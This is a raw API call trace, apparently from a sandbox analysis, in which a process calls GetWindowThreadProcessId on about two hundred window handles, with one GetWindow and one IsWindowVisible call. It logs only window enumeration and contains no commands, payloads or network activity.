	[0464.708] GetWindowThreadProcessId (in: hWnd=0x10084, lpdwProcessId=0x14d9c0 | out: lpdwProcessId=0x14d9c0) returned 0x4d0
	[0464.708] GetWindowThreadProcessId (in: hWnd=0x10082, lpdwProcessId=0x14d9c0 | out: lpdwProcessId=0x14d9c0) returned 0x4d0
	[0464.708] GetWindowThreadProcessId (in: hWnd=0x1007e, lpdwProcessId=0x14d9c0 | out: lpdwProcessId=0x14d9c0) returned 0x4d0
	[0464.708] GetWindowThreadProcessId (in: hWnd=0x1005e, lpdwProcessId=0x14d9c0 | out: lpdwProcessId=0x14d9c0) returned 0x4d0
	[0464.708] GetWindowThreadProcessId (in: hWnd=0x10056, lpdwProcessId=0x14d9c0 | out: lpdwProcessId=0x14d9c0) returned 0x4d0
	[0464.708] GetWindowThreadProcessId (in: hWnd=0x100fa, lpdwProcessId=0x14d9c0 | out: lpdwProcessId=0x14d9c0) returned 0x460
	[0464.708] GetWindowThreadProcessId (in: hWnd=0x500a2, lpdwProcessId=0x14d9c0 | out: lpdwProcessId=0x14d9c0) returned 0x4d0
	[0464.708] GetWindowThreadProcessId (in: hWnd=0x10092, lpdwProcessId=0x14d9c0 | out: lpdwProcessId=0x14d9c0) returned 0x4d0
	[0464.708] GetWindowThreadProcessId (in: hWnd=0x1072c, lpdwProcessId=0x14d9c0 | out: lpdwProcessId=0x14d9c0) returned 0x1694
	[0464.708] GetWindowThreadProcessId (in: hWnd=0x1071e, lpdwProcessId=0x14d9c0 | out: lpdwProcessId=0x14d9c0) returned 0x1770
	[0464.708] GetWindowThreadProcessId (in: hWnd=0x10710, lpdwProcessId=0x14d9c0 | out: lpdwProcessId=0x14d9c0) returned 0x1720
	[0464.709] GetWindowThreadProcessId (in: hWnd=0x10702, lpdwProcessId=0x14d9c0 | out: lpdwProcessId=0x14d9c0) returned 0x165c
	[0464.709] GetWindowThreadProcessId (in: hWnd=0x106ca, lpdwProcessId=0x14d9c0 | out: lpdwProcessId=0x14d9c0) returned 0x1578
	[0464.709] GetWindowThreadProcessId (in: hWnd=0x204a6, lpdwProcessId=0x14d9c0 | out: lpdwProcessId=0x14d9c0) returned 0x16c0
	[0464.709] GetWindowThreadProcessId (in: hWnd=0x106c4, lpdwProcessId=0x14d9c0 | out: lpdwProcessId=0x14d9c0) returned 0x161c
	[0464.709] GetWindowThreadProcessId (in: hWnd=0x106c0, lpdwProcessId=0x14d9c0 | out: lpdwProcessId=0x14d9c0) returned 0x1638
	[0464.709] GetWindowThreadProcessId (in: hWnd=0x20362, lpdwProcessId=0x14d9c0 | out: lpdwProcessId=0x14d9c0) returned 0x15c8
	[0464.709] GetWindowThreadProcessId (in: hWnd=0x106be, lpdwProcessId=0x14d9c0 | out: lpdwProcessId=0x14d9c0) returned 0x1554
	[0464.709] GetWindowThreadProcessId (in: hWnd=0x106bc, lpdwProcessId=0x14d9c0 | out: lpdwProcessId=0x14d9c0) returned 0x1674
	[0464.709] GetWindowThreadProcessId (in: hWnd=0x106b4, lpdwProcessId=0x14d9c0 | out: lpdwProcessId=0x14d9c0) returned 0x1520
	[0464.709] GetWindowThreadProcessId (in: hWnd=0x1068e, lpdwProcessId=0x14d9c0 | out: lpdwProcessId=0x14d9c0) returned 0x14bc
	[0464.709] GetWindowThreadProcessId (in: hWnd=0x1067e, lpdwProcessId=0x14d9c0 | out: lpdwProcessId=0x14d9c0) returned 0xf8c
	[0464.709] GetWindowThreadProcessId (in: hWnd=0x1066e, lpdwProcessId=0x14d9c0 | out: lpdwProcessId=0x14d9c0) returned 0xe9c
	[0464.710] GetWindowThreadProcessId (in: hWnd=0x1065e, lpdwProcessId=0x14d9c0 | out: lpdwProcessId=0x14d9c0) returned 0x1434
	[0464.710] GetWindowThreadProcessId (in: hWnd=0x1064e, lpdwProcessId=0x14d9c0 | out: lpdwProcessId=0x14d9c0) returned 0x14ec
	[0464.710] GetWindowThreadProcessId (in: hWnd=0x1063e, lpdwProcessId=0x14d9c0 | out: lpdwProcessId=0x14d9c0) returned 0xfcc
	[0464.710] GetWindowThreadProcessId (in: hWnd=0x1062e, lpdwProcessId=0x14d9c0 | out: lpdwProcessId=0x14d9c0) returned 0x12ac
	[0464.710] GetWindowThreadProcessId (in: hWnd=0x1062a, lpdwProcessId=0x14d9c0 | out: lpdwProcessId=0x14d9c0) returned 0x1484
	[0464.710] GetWindowThreadProcessId (in: hWnd=0x10626, lpdwProcessId=0x14d9c0 | out: lpdwProcessId=0x14d9c0) returned 0x934
	[0464.710] GetWindowThreadProcessId (in: hWnd=0x10622, lpdwProcessId=0x14d9c0 | out: lpdwProcessId=0x14d9c0) returned 0xc0c
	[0464.710] GetWindowThreadProcessId (in: hWnd=0x1061c, lpdwProcessId=0x14d9c0 | out: lpdwProcessId=0x14d9c0) returned 0xb08
	[0464.710] GetWindowThreadProcessId (in: hWnd=0x10610, lpdwProcessId=0x14d9c0 | out: lpdwProcessId=0x14d9c0) returned 0x948
	[0464.710] GetWindowThreadProcessId (in: hWnd=0x1060c, lpdwProcessId=0x14d9c0 | out: lpdwProcessId=0x14d9c0) returned 0x1178
	[0464.710] GetWindowThreadProcessId (in: hWnd=0x105fa, lpdwProcessId=0x14d9c0 | out: lpdwProcessId=0x14d9c0) returned 0x13e0
	[0464.710] GetWindowThreadProcessId (in: hWnd=0x105ea, lpdwProcessId=0x14d9c0 | out: lpdwProcessId=0x14d9c0) returned 0xcd0
	[0464.710] GetWindowThreadProcessId (in: hWnd=0x105da, lpdwProcessId=0x14d9c0 | out: lpdwProcessId=0x14d9c0) returned 0x13fc
	[0464.711] GetWindowThreadProcessId (in: hWnd=0x105c6, lpdwProcessId=0x14d9c0 | out: lpdwProcessId=0x14d9c0) returned 0xdc8
	[0464.711] GetWindowThreadProcessId (in: hWnd=0x105b6, lpdwProcessId=0x14d9c0 | out: lpdwProcessId=0x14d9c0) returned 0xc18
	[0464.711] GetWindowThreadProcessId (in: hWnd=0x105a6, lpdwProcessId=0x14d9c0 | out: lpdwProcessId=0x14d9c0) returned 0xc2c
	[0464.711] GetWindowThreadProcessId (in: hWnd=0x10580, lpdwProcessId=0x14d9c0 | out: lpdwProcessId=0x14d9c0) returned 0xa1c
	[0464.711] GetWindowThreadProcessId (in: hWnd=0x10578, lpdwProcessId=0x14d9c0 | out: lpdwProcessId=0x14d9c0) returned 0x1244
	[0464.711] GetWindowThreadProcessId (in: hWnd=0x10574, lpdwProcessId=0x14d9c0 | out: lpdwProcessId=0x14d9c0) returned 0xdb0
	[0464.711] GetWindowThreadProcessId (in: hWnd=0x20356, lpdwProcessId=0x14d9c0 | out: lpdwProcessId=0x14d9c0) returned 0x1398
	[0464.711] GetWindowThreadProcessId (in: hWnd=0x10566, lpdwProcessId=0x14d9c0 | out: lpdwProcessId=0x14d9c0) returned 0x1358
	[0464.711] GetWindowThreadProcessId (in: hWnd=0x10562, lpdwProcessId=0x14d9c0 | out: lpdwProcessId=0x14d9c0) returned 0x1370
	[0464.711] GetWindowThreadProcessId (in: hWnd=0x1055e, lpdwProcessId=0x14d9c0 | out: lpdwProcessId=0x14d9c0) returned 0x1340
	[0464.712] GetWindowThreadProcessId (in: hWnd=0x10558, lpdwProcessId=0x14d9c0 | out: lpdwProcessId=0x14d9c0) returned 0x130c
	[0464.712] GetWindowThreadProcessId (in: hWnd=0x10550, lpdwProcessId=0x14d9c0 | out: lpdwProcessId=0x14d9c0) returned 0x12c0
	[0464.712] GetWindowThreadProcessId (in: hWnd=0x2053a, lpdwProcessId=0x14d9c0 | out: lpdwProcessId=0x14d9c0) returned 0x12e4
	[0464.712] GetWindowThreadProcessId (in: hWnd=0x1051a, lpdwProcessId=0x14d9c0 | out: lpdwProcessId=0x14d9c0) returned 0x1270
	[0464.712] GetWindowThreadProcessId (in: hWnd=0x1050a, lpdwProcessId=0x14d9c0 | out: lpdwProcessId=0x14d9c0) returned 0x1298
	[0464.712] GetWindowThreadProcessId (in: hWnd=0x104fa, lpdwProcessId=0x14d9c0 | out: lpdwProcessId=0x14d9c0) returned 0x120c
	[0464.712] GetWindowThreadProcessId (in: hWnd=0x204d6, lpdwProcessId=0x14d9c0 | out: lpdwProcessId=0x14d9c0) returned 0x122c
	[0464.712] GetWindowThreadProcessId (in: hWnd=0x104ce, lpdwProcessId=0x14d9c0 | out: lpdwProcessId=0x14d9c0) returned 0x11c4
	[0464.712] GetWindowThreadProcessId (in: hWnd=0x202d6, lpdwProcessId=0x14d9c0 | out: lpdwProcessId=0x14d9c0) returned 0x11b0
	[0464.712] GetWindowThreadProcessId (in: hWnd=0x104c8, lpdwProcessId=0x14d9c0 | out: lpdwProcessId=0x14d9c0) returned 0x1188
	[0464.712] GetWindowThreadProcessId (in: hWnd=0x104c4, lpdwProcessId=0x14d9c0 | out: lpdwProcessId=0x14d9c0) returned 0x1148
	[0464.712] GetWindowThreadProcessId (in: hWnd=0x202e6, lpdwProcessId=0x14d9c0 | out: lpdwProcessId=0x14d9c0) returned 0x1160
	[0464.712] GetWindowThreadProcessId (in: hWnd=0x30272, lpdwProcessId=0x14d9c0 | out: lpdwProcessId=0x14d9c0) returned 0x10fc
	[0464.712] GetWindowThreadProcessId (in: hWnd=0x104bc, lpdwProcessId=0x14d9c0 | out: lpdwProcessId=0x14d9c0) returned 0xe34
	[0464.713] GetWindowThreadProcessId (in: hWnd=0x104ac, lpdwProcessId=0x14d9c0 | out: lpdwProcessId=0x14d9c0) returned 0xea4
	[0464.713] GetWindowThreadProcessId (in: hWnd=0x1048e, lpdwProcessId=0x14d9c0 | out: lpdwProcessId=0x14d9c0) returned 0x514
	[0464.713] GetWindowThreadProcessId (in: hWnd=0x1047e, lpdwProcessId=0x14d9c0 | out: lpdwProcessId=0x14d9c0) returned 0xe48
	[0464.713] GetWindowThreadProcessId (in: hWnd=0x1046e, lpdwProcessId=0x14d9c0 | out: lpdwProcessId=0x14d9c0) returned 0xbc8
	[0464.713] GetWindowThreadProcessId (in: hWnd=0x1045e, lpdwProcessId=0x14d9c0 | out: lpdwProcessId=0x14d9c0) returned 0xdf8
	[0464.713] GetWindowThreadProcessId (in: hWnd=0x1044c, lpdwProcessId=0x14d9c0 | out: lpdwProcessId=0x14d9c0) returned 0x318
	[0464.713] GetWindowThreadProcessId (in: hWnd=0x10440, lpdwProcessId=0x14d9c0 | out: lpdwProcessId=0x14d9c0) returned 0xcac
	[0464.713] GetWindowThreadProcessId (in: hWnd=0x10438, lpdwProcessId=0x14d9c0 | out: lpdwProcessId=0x14d9c0) returned 0x8bc
	[0464.713] GetWindowThreadProcessId (in: hWnd=0x10434, lpdwProcessId=0x14d9c0 | out: lpdwProcessId=0x14d9c0) returned 0xf9c
	[0464.713] GetWindowThreadProcessId (in: hWnd=0x10430, lpdwProcessId=0x14d9c0 | out: lpdwProcessId=0x14d9c0) returned 0xf48
	[0464.713] GetWindowThreadProcessId (in: hWnd=0x10414, lpdwProcessId=0x14d9c0 | out: lpdwProcessId=0x14d9c0) returned 0xe40
	[0464.713] GetWindowThreadProcessId (in: hWnd=0x10410, lpdwProcessId=0x14d9c0 | out: lpdwProcessId=0x14d9c0) returned 0xecc
	[0464.713] GetWindowThreadProcessId (in: hWnd=0x1040c, lpdwProcessId=0x14d9c0 | out: lpdwProcessId=0x14d9c0) returned 0xeb8
	[0464.714] GetWindowThreadProcessId (in: hWnd=0x10408, lpdwProcessId=0x14d9c0 | out: lpdwProcessId=0x14d9c0) returned 0xe80
	[0464.714] GetWindowThreadProcessId (in: hWnd=0x10404, lpdwProcessId=0x14d9c0 | out: lpdwProcessId=0x14d9c0) returned 0xe98
	[0464.714] GetWindowThreadProcessId (in: hWnd=0x10400, lpdwProcessId=0x14d9c0 | out: lpdwProcessId=0x14d9c0) returned 0xe60
	[0464.714] GetWindowThreadProcessId (in: hWnd=0x103fc, lpdwProcessId=0x14d9c0 | out: lpdwProcessId=0x14d9c0) returned 0xee4
	[0464.714] GetWindowThreadProcessId (in: hWnd=0x103ee, lpdwProcessId=0x14d9c0 | out: lpdwProcessId=0x14d9c0) returned 0xf00
	[0464.714] GetWindowThreadProcessId (in: hWnd=0x10398, lpdwProcessId=0x14d9c0 | out: lpdwProcessId=0x14d9c0) returned 0xdf0
	[0464.714] GetWindowThreadProcessId (in: hWnd=0x10388, lpdwProcessId=0x14d9c0 | out: lpdwProcessId=0x14d9c0) returned 0xe1c
	[0464.715] GetWindow (hWnd=0x10388, uCmd=0x4) returned 0x0
	[0464.715] IsWindowVisible (hWnd=0x10388) returned 0
	[0464.715] GetWindowThreadProcessId (in: hWnd=0x10380, lpdwProcessId=0x14d9c0 | out: lpdwProcessId=0x14d9c0) returned 0xdd0
	[0464.715] GetWindowThreadProcessId (in: hWnd=0x1036c, lpdwProcessId=0x14d9c0 | out: lpdwProcessId=0x14d9c0) returned 0xd94
	[0464.715] GetWindowThreadProcessId (in: hWnd=0x10368, lpdwProcessId=0x14d9c0 | out: lpdwProcessId=0x14d9c0) returned 0xd74
	[0464.716] GetWindowThreadProcessId (in: hWnd=0x10364, lpdwProcessId=0x14d9c0 | out: lpdwProcessId=0x14d9c0) returned 0xd00
	[0464.716] GetWindowThreadProcessId (in: hWnd=0x1035e, lpdwProcessId=0x14d9c0 | out: lpdwProcessId=0x14d9c0) returned 0xcd8
	[0464.716] GetWindowThreadProcessId (in: hWnd=0x20240, lpdwProcessId=0x14d9c0 | out: lpdwProcessId=0x14d9c0) returned 0xc84
	[0464.716] GetWindowThreadProcessId (in: hWnd=0x30220, lpdwProcessId=0x14d9c0 | out: lpdwProcessId=0x14d9c0) returned 0xca4
	[0464.716] GetWindowThreadProcessId (in: hWnd=0x2010e, lpdwProcessId=0x14d9c0 | out: lpdwProcessId=0x14d9c0) returned 0xc64
	[0464.716] GetWindowThreadProcessId (in: hWnd=0x10344, lpdwProcessId=0x14d9c0 | out: lpdwProcessId=0x14d9c0) returned 0xc24
	[0464.716] GetWindowThreadProcessId (in: hWnd=0x1032a, lpdwProcessId=0x14d9c0 | out: lpdwProcessId=0x14d9c0) returned 0xb84
	[0464.716] GetWindowThreadProcessId (in: hWnd=0x10316, lpdwProcessId=0x14d9c0 | out: lpdwProcessId=0x14d9c0) returned 0xbac
	[0464.716] GetWindowThreadProcessId (in: hWnd=0x102f8, lpdwProcessId=0x14d9c0 | out: lpdwProcessId=0x14d9c0) returned 0x384
	[0464.716] GetWindowThreadProcessId (in: hWnd=0x102de, lpdwProcessId=0x14d9c0 | out: lpdwProcessId=0x14d9c0) returned 0xab8
	[0464.716] GetWindowThreadProcessId (in: hWnd=0x102da, lpdwProcessId=0x14d9c0 | out: lpdwProcessId=0x14d9c0) returned 0x33c
	[0464.716] GetWindowThreadProcessId (in: hWnd=0x102d0, lpdwProcessId=0x14d9c0 | out: lpdwProcessId=0x14d9c0) returned 0xa44
	[0464.716] GetWindowThreadProcessId (in: hWnd=0x102cc, lpdwProcessId=0x14d9c0 | out: lpdwProcessId=0x14d9c0) returned 0xa64
	[0464.716] GetWindowThreadProcessId (in: hWnd=0x102c8, lpdwProcessId=0x14d9c0 | out: lpdwProcessId=0x14d9c0) returned 0x8a8
	[0464.717] GetWindowThreadProcessId (in: hWnd=0x102c4, lpdwProcessId=0x14d9c0 | out: lpdwProcessId=0x14d9c0) returned 0xaf0
	[0464.717] GetWindowThreadProcessId (in: hWnd=0x102c0, lpdwProcessId=0x14d9c0 | out: lpdwProcessId=0x14d9c0) returned 0x88c
	[0464.717] GetWindowThreadProcessId (in: hWnd=0x102bc, lpdwProcessId=0x14d9c0 | out: lpdwProcessId=0x14d9c0) returned 0xb04
	[0464.717] GetWindowThreadProcessId (in: hWnd=0x102b0, lpdwProcessId=0x14d9c0 | out: lpdwProcessId=0x14d9c0) returned 0x910
	[0464.717] GetWindowThreadProcessId (in: hWnd=0x102ac, lpdwProcessId=0x14d9c0 | out: lpdwProcessId=0x14d9c0) returned 0x230
	[0464.717] GetWindowThreadProcessId (in: hWnd=0x30298, lpdwProcessId=0x14d9c0 | out: lpdwProcessId=0x14d9c0) returned 0xac0
	[0464.717] GetWindowThreadProcessId (in: hWnd=0x2029a, lpdwProcessId=0x14d9c0 | out: lpdwProcessId=0x14d9c0) returned 0xab4
	[0464.717] GetWindowThreadProcessId (in: hWnd=0x10262, lpdwProcessId=0x14d9c0 | out: lpdwProcessId=0x14d9c0) returned 0xaac
	[0464.717] GetWindowThreadProcessId (in: hWnd=0x10252, lpdwProcessId=0x14d9c0 | out: lpdwProcessId=0x14d9c0) returned 0x3d0
	[0464.717] GetWindowThreadProcessId (in: hWnd=0x10242, lpdwProcessId=0x14d9c0 | out: lpdwProcessId=0x14d9c0) returned 0x978
	[0464.717] GetWindowThreadProcessId (in: hWnd=0x10228, lpdwProcessId=0x14d9c0 | out: lpdwProcessId=0x14d9c0) returned 0xa7c
	[0464.717] GetWindowThreadProcessId (in: hWnd=0x10224, lpdwProcessId=0x14d9c0 | out: lpdwProcessId=0x14d9c0) returned 0x59c
	[0464.717] GetWindowThreadProcessId (in: hWnd=0x20212, lpdwProcessId=0x14d9c0 | out: lpdwProcessId=0x14d9c0) returned 0xa88
	[0464.718] GetWindowThreadProcessId (in: hWnd=0x1021c, lpdwProcessId=0x14d9c0 | out: lpdwProcessId=0x14d9c0) returned 0xa6c
	[0464.718] GetWindowThreadProcessId (in: hWnd=0x10214, lpdwProcessId=0x14d9c0 | out: lpdwProcessId=0x14d9c0) returned 0xa68
	[0464.718] GetWindowThreadProcessId (in: hWnd=0x20206, lpdwProcessId=0x14d9c0 | out: lpdwProcessId=0x14d9c0) returned 0x9f8
	[0464.718] GetWindowThreadProcessId (in: hWnd=0x20204, lpdwProcessId=0x14d9c0 | out: lpdwProcessId=0x14d9c0) returned 0xa04
	[0464.718] GetWindowThreadProcessId (in: hWnd=0x1020a, lpdwProcessId=0x14d9c0 | out: lpdwProcessId=0x14d9c0) returned 0x924
	[0464.718] GetWindowThreadProcessId (in: hWnd=0x10200, lpdwProcessId=0x14d9c0 | out: lpdwProcessId=0x14d9c0) returned 0x8dc
	[0464.718] GetWindowThreadProcessId (in: hWnd=0x201ec, lpdwProcessId=0x14d9c0 | out: lpdwProcessId=0x14d9c0) returned 0x7dc
	[0464.718] GetWindowThreadProcessId (in: hWnd=0x301d6, lpdwProcessId=0x14d9c0 | out: lpdwProcessId=0x14d9c0) returned 0x768
	[0464.718] GetWindowThreadProcessId (in: hWnd=0x301e0, lpdwProcessId=0x14d9c0 | out: lpdwProcessId=0x14d9c0) returned 0x764
	[0464.718] GetWindowThreadProcessId (in: hWnd=0x201e4, lpdwProcessId=0x14d9c0 | out: lpdwProcessId=0x14d9c0) returned 0x820
	[0464.718] GetWindowThreadProcessId (in: hWnd=0x201c6, lpdwProcessId=0x14d9c0 | out: lpdwProcessId=0x14d9c0) returned 0x810
	[0464.718] GetWindowThreadProcessId (in: hWnd=0x301f2, lpdwProcessId=0x14d9c0 | out: lpdwProcessId=0x14d9c0) returned 0x794
	[0464.718] GetWindowThreadProcessId (in: hWnd=0x401b6, lpdwProcessId=0x14d9c0 | out: lpdwProcessId=0x14d9c0) returned 0x83c
	[0464.718] GetWindowThreadProcessId (in: hWnd=0x501be, lpdwProcessId=0x14d9c0 | out: lpdwProcessId=0x14d9c0) returned 0x7ac
	[0464.719] GetWindowThreadProcessId (in: hWnd=0x160162, lpdwProcessId=0x14d9c0 | out: lpdwProcessId=0x14d9c0) returned 0xb44
	[0464.719] GetWindowThreadProcessId (in: hWnd=0x500ea, lpdwProcessId=0x14d9c0 | out: lpdwProcessId=0x14d9c0) returned 0xb5c
	[0464.719] GetWindowThreadProcessId (in: hWnd=0x101b0, lpdwProcessId=0x14d9c0 | out: lpdwProcessId=0x14d9c0) returned 0x838
	[0464.719] GetWindowThreadProcessId (in: hWnd=0x800a8, lpdwProcessId=0x14d9c0 | out: lpdwProcessId=0x14d9c0) returned 0x4d0
	[0464.719] GetWindowThreadProcessId (in: hWnd=0x400b0, lpdwProcessId=0x14d9c0 | out: lpdwProcessId=0x14d9c0) returned 0x4d0
	[0464.719] GetWindowThreadProcessId (in: hWnd=0x300c6, lpdwProcessId=0x14d9c0 | out: lpdwProcessId=0x14d9c0) returned 0x4d0
	[0464.719] GetWindowThreadProcessId (in: hWnd=0x300d2, lpdwProcessId=0x14d9c0 | out: lpdwProcessId=0x14d9c0) returned 0x4d0
	[0464.719] GetWindowThreadProcessId (in: hWnd=0x300ce, lpdwProcessId=0x14d9c0 | out: lpdwProcessId=0x14d9c0) returned 0x4d0
	[0464.719] GetWindowThreadProcessId (in: hWnd=0x300d8, lpdwProcessId=0x14d9c0 | out: lpdwProcessId=0x14d9c0) returned 0x4d0
	[0464.719] GetWindowThreadProcessId (in: hWnd=0x400b8, lpdwProcessId=0x14d9c0 | out: lpdwProcessId=0x14d9c0) returned 0x4d0
	[0464.719] GetWindowThreadProcessId (in: hWnd=0x300ac, lpdwProcessId=0x14d9c0 | out: lpdwProcessId=0x14d9c0) returned 0x4d0
	[0464.719] GetWindowThreadProcessId (in: hWnd=0x101ac, lpdwProcessId=0x14d9c0 | out: lpdwProcessId=0x14d9c0) returned 0x818
	[0464.719] GetWindowThreadProcessId (in: hWnd=0x101a8, lpdwProcessId=0x14d9c0 | out: lpdwProcessId=0x14d9c0) returned 0x5b8
	[0464.720] GetWindowThreadProcessId (in: hWnd=0x101a4, lpdwProcessId=0x14d9c0 | out: lpdwProcessId=0x14d9c0) returned 0x494
	[0464.720] GetWindowThreadProcessId (in: hWnd=0x101a0, lpdwProcessId=0x14d9c0 | out: lpdwProcessId=0x14d9c0) returned 0x1ec
	[0464.720] GetWindowThreadProcessId (in: hWnd=0x1019c, lpdwProcessId=0x14d9c0 | out: lpdwProcessId=0x14d9c0) returned 0x440
	[0464.720] GetWindowThreadProcessId (in: hWnd=0x10198, lpdwProcessId=0x14d9c0 | out: lpdwProcessId=0x14d9c0) returned 0x7e8
	[0464.720] GetWindowThreadProcessId (in: hWnd=0x10194, lpdwProcessId=0x14d9c0 | out: lpdwProcessId=0x14d9c0) returned 0x730
	[0464.720] GetWindowThreadProcessId (in: hWnd=0x10190, lpdwProcessId=0x14d9c0 | out: lpdwProcessId=0x14d9c0) returned 0x2c8
	[0464.720] GetWindowThreadProcessId (in: hWnd=0x1018c, lpdwProcessId=0x14d9c0 | out: lpdwProcessId=0x14d9c0) returned 0x31c
	[0464.720] GetWindowThreadProcessId (in: hWnd=0x10188, lpdwProcessId=0x14d9c0 | out: lpdwProcessId=0x14d9c0) returned 0x330
	[0464.720] GetWindowThreadProcessId (in: hWnd=0x10184, lpdwProcessId=0x14d9c0 | out: lpdwProcessId=0x14d9c0) returned 0x128
	[0464.720] GetWindowThreadProcessId (in: hWnd=0x10180, lpdwProcessId=0x14d9c0 | out: lpdwProcessId=0x14d9c0) returned 0x5c8
	[0464.720] GetWindowThreadProcessId (in: hWnd=0x1017c, lpdwProcessId=0x14d9c0 | out: lpdwProcessId=0x14d9c0) returned 0x6f8
	[0464.720] GetWindowThreadProcessId (in: hWnd=0x10178, lpdwProcessId=0x14d9c0 | out: lpdwProcessId=0x14d9c0) returned 0x358
	[0464.720] GetWindowThreadProcessId (in: hWnd=0x10174, lpdwProcessId=0x14d9c0 | out: lpdwProcessId=0x14d9c0) returned 0x73c
	[0464.721] GetWindowThreadProcessId (in: hWnd=0x10170, lpdwProcessId=0x14d9c0 | out: lpdwProcessId=0x14d9c0) returned 0xb0
	[0464.721] GetWindowThreadProcessId (in: hWnd=0x1016c, lpdwProcessId=0x14d9c0 | out: lpdwProcessId=0x14d9c0) returned 0x250
	[0464.721] GetWindowThreadProcessId (in: hWnd=0x10168, lpdwProcessId=0x14d9c0 | out: lpdwProcessId=0x14d9c0) returned 0x240
	[0464.721] GetWindowThreadProcessId (in: hWnd=0x2015e, lpdwProcessId=0x14d9c0 | out: lpdwProcessId=0x14d9c0) returned 0x790
	[0464.721] GetWindowThreadProcessId (in: hWnd=0x40112, lpdwProcessId=0x14d9c0 | out: lpdwProcessId=0x14d9c0) returned 0x61c
	[0464.721] GetWindowThreadProcessId (in: hWnd=0x3015a, lpdwProcessId=0x14d9c0 | out: lpdwProcessId=0x14d9c0) returned 0x540
	[0464.721] GetWindowThreadProcessId (in: hWnd=0x10150, lpdwProcessId=0x14d9c0 | out: lpdwProcessId=0x14d9c0) returned 0x538
	[0464.721] GetWindowThreadProcessId (in: hWnd=0x1014e, lpdwProcessId=0x14d9c0 | out: lpdwProcessId=0x14d9c0) returned 0x568
	[0464.721] GetWindowThreadProcessId (in: hWnd=0x20144, lpdwProcessId=0x14d9c0 | out: lpdwProcessId=0x14d9c0) returned 0x538
	[0464.721] GetWindowThreadProcessId (in: hWnd=0x10138, lpdwProcessId=0x14d9c0 | out: lpdwProcessId=0x14d9c0) returned 0x568
	[0464.721] GetWindowThreadProcessId (in: hWnd=0x10130, lpdwProcessId=0x14d9c0 | out: lpdwProcessId=0x14d9c0) returned 0x538
	[0464.721] GetWindowThreadProcessId (in: hWnd=0x10126, lpdwProcessId=0x14d9c0 | out: lpdwProcessId=0x14d9c0) returned 0x540
	[0464.721] GetWindowThreadProcessId (in: hWnd=0x200d6, lpdwProcessId=0x14d9c0 | out: lpdwProcessId=0x14d9c0) returned 0x540
	[0464.721] GetWindowThreadProcessId (in: hWnd=0x1010c, lpdwProcessId=0x14d9c0 | out: lpdwProcessId=0x14d9c0) returned 0x57c
	[0464.722] GetWindowThreadProcessId (in: hWnd=0x10108, lpdwProcessId=0x14d9c0 | out: lpdwProcessId=0x14d9c0) returned 0x460
	[0464.722] GetWindowThreadProcessId (in: hWnd=0x10102, lpdwProcessId=0x14d9c0 | out: lpdwProcessId=0x14d9c0) returned 0x554
	[0464.722] GetWindowThreadProcessId (in: hWnd=0x50094, lpdwProcessId=0x14d9c0 | out: lpdwProcessId=0x14d9c0) returned 0x4d0
	[0464.722] GetWindowThreadProcessId (in: hWnd=0x1008a, lpdwProcessId=0x14d9c0 | out: lpdwProcessId=0x14d9c0) returned 0x528
	[0464.722] GetWindowThreadProcessId (in: hWnd=0x10088, lpdwProcessId=0x14d9c0 | out: lpdwProcessId=0x14d9c0) returned 0x4d0
	[0464.722] GetWindowThreadProcessId (in: hWnd=0x10080, lpdwProcessId=0x14d9c0 | out: lpdwProcessId=0x14d9c0) returned 0x4d0
	[0464.722] GetWindowThreadProcessId (in: hWnd=0x1006e, lpdwProcessId=0x14d9c0 | out: lpdwProcessId=0x14d9c0) returned 0x4d0
	[0464.722] GetWindowThreadProcessId (in: hWnd=0x20020, lpdwProcessId=0x14d9c0 | out: lpdwProcessId=0x14d9c0) returned 0x79c
	[0464.722] GetWindowThreadProcessId (in: hWnd=0x1006a, lpdwProcessId=0x14d9c0 | out: lpdwProcessId=0x14d9c0) returned 0x4d0
	[0464.722] GetWindowThreadProcessId (in: hWnd=0x10058, lpdwProcessId=0x14d9c0 | out: lpdwProcessId=0x14d9c0) returned 0x4e0
	[0464.722] GetWindowThreadProcessId (in: hWnd=0x10052, lpdwProcessId=0x14d9c0 | out: lpdwProcessId=0x14d9c0) returned 0x4d0
	[0464.722] GetWindowThreadProcessId (in: hWnd=0x1004a, lpdwProcessId=0x14d9c0 | out: lpdwProcessId=0x14d9c0) returned 0x460
	[0464.722] GetWindowThreadProcessId (in: hWnd=0x20046, lpdwProcessId=0x14d9c0 | out: lpdwProcessId=0x14d9c0) returned 0x460
	[0464.723] GetWindowThreadProcessId (in: hWnd=0x30044, lpdwProcessId=0x14d9c0 | out: lpdwProcessId=0x14d9c0) returned 0x44c
	[0464.723] GetWindowThreadProcessId (in: hWnd=0x20018, lpdwProcessId=0x14d9c0 | out: lpdwProcessId=0x14d9c0) returned 0x778
	[0464.723] GetWindowThreadProcessId (in: hWnd=0x100f2, lpdwProcessId=0x14d9c0 | out: lpdwProcessId=0x14d9c0) returned 0x460
	[0464.723] GetWindowThreadProcessId (in: hWnd=0x30140, lpdwProcessId=0x14d9c0 | out: lpdwProcessId=0x14d9c0) returned 0x558
	[0464.723] GetWindowThreadProcessId (in: hWnd=0x1005c, lpdwProcessId=0x14d9c0 | out: lpdwProcessId=0x14d9c0) returned 0x4d0
	[0464.723] GetWindowThreadProcessId (in: hWnd=0x10054, lpdwProcessId=0x14d9c0 | out: lpdwProcessId=0x14d9c0) returned 0x4d0
	[0464.723] GetWindowThreadProcessId (in: hWnd=0x1072e, lpdwProcessId=0x14d9c0 | out: lpdwProcessId=0x14d9c0) returned 0x1198
	[0464.723] GetWindowThreadProcessId (in: hWnd=0x10720, lpdwProcessId=0x14d9c0 | out: lpdwProcessId=0x14d9c0) returned 0x1080
	[0464.723] GetWindowThreadProcessId (in: hWnd=0x10712, lpdwProcessId=0x14d9c0 | out: lpdwProcessId=0x14d9c0) returned 0x1074
	[0464.723] GetWindowThreadProcessId (in: hWnd=0x10704, lpdwProcessId=0x14d9c0 | out: lpdwProcessId=0x14d9c0) returned 0x106c
	[0464.723] GetWindowThreadProcessId (in: hWnd=0x106cc, lpdwProcessId=0x14d9c0 | out: lpdwProcessId=0x14d9c0) returned 0x1474
	[0464.723] GetWindowThreadProcessId (in: hWnd=0x106c8, lpdwProcessId=0x14d9c0 | out: lpdwProcessId=0x14d9c0) returned 0x1414
	[0464.723] GetWindowThreadProcessId (in: hWnd=0x106c6, lpdwProcessId=0x14d9c0 | out: lpdwProcessId=0x14d9c0) returned 0xbd0
	[0464.724] GetWindowThreadProcessId (in: hWnd=0x106c2, lpdwProcessId=0x14d9c0 | out: lpdwProcessId=0x14d9c0) returned 0x550
	[0464.724] GetWindowThreadProcessId (in: hWnd=0x20370, lpdwProcessId=0x14d9c0 | out: lpdwProcessId=0x14d9c0) returned 0xa38
